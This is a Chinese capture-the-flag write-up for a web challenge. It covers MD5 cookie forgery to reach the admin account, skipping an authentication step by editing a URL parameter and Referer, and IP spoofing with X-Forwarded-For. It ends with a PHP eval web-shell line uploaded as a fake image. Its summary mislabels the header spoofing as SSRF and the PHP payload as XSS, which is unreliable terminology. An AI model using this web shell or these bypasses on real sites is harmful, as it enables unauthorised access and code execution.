攻防世界：web Bug

目录

• 靶场分析
• 登录admin
• 伪造IP
• 总结

靶场分析

这道题涉及到解密我是没有想到的
拿到手，是一个登录界面：

拿扫描器扫描，发现没有其他的文件

分析可能存在的漏洞：

• SQL注入漏洞
• SQL二次注入漏洞
• 其他逻辑漏洞

经过尝试，前两个漏洞都没有，只有可能是最后一个漏洞了

登录admin

我们登录一个账户进去，点击manager，发现弹窗提示：

猜想管理员的账号是admin，回到注册界面，注册一个admin账号：

显示admin已经被注册，所以现在的目标就是想办法登录进admin的账号
回到登录面板，我们多注册几个账号并登录，抓包观察：


发现每次登录都会返回一个user的cookie，而且多次登录同一个账户，返回的cookie值是一样的。
而且观察到，这个字符串的位数是32位，猜想很有可能是md5加密
说明：这个userCookie的生成是有规律的MD5加密
看网上的答案是MD5(UID:username)的加密方法。
使用这种加密方法即可随意登录一个账户，然后点击personal，这样就可以看见他的信息了

但是网上的另一个大佬的方法是：

绕过了第一步的找回密码认证，直接来到第二步,操作是：

• 修改了URL上的step=1为2
• 修改了Referer头

确实，牛啊牛

伪造IP

如愿登录admin之后打开manager，发现它对IP做了 加固

但是我们有办法，这就是使用X-Forwarded-For:127.0.0.1实现SSRF注入
在报文里面加上这个，然后实行

就可以看到还是没有flag

这个时候一般点下检查还是会有提示的：

这个提示我们需要完成一些操作
看见filemanager，估计就是文件上传

果然upload是有用的，但是里面也说了，只能是图片文件
上传一个PHP图片，有Content-Type来进行甄别的，那就改动这个为image/gif吧
为了保险起见，文件名也改一改


没用，怕不是对文件内容做了过滤
最后经过测试，如下的改动可以回显出flag

<script language="php"> alert(@eval($_POST['cmd']))</script>

总结

• 不要总想着解密，md5不配凡人猜出来
• 第一步过不去可以尝试第二步，记得把referer改成第一步的URL，然后把表示第一步的变量改成第二步的变量，比如step=1改成step=2
• IP出现问题直接上X-forwarded-For: 127.0.0.1
• 文件上传漏洞，直接该Content-Type和文件名外，可能还对内容做了过滤，这个时候就需要变通为XSS注入了
• 这道题考了，逻辑漏洞、身份验证漏洞、文件上传漏洞、XSS漏洞、SSRF漏洞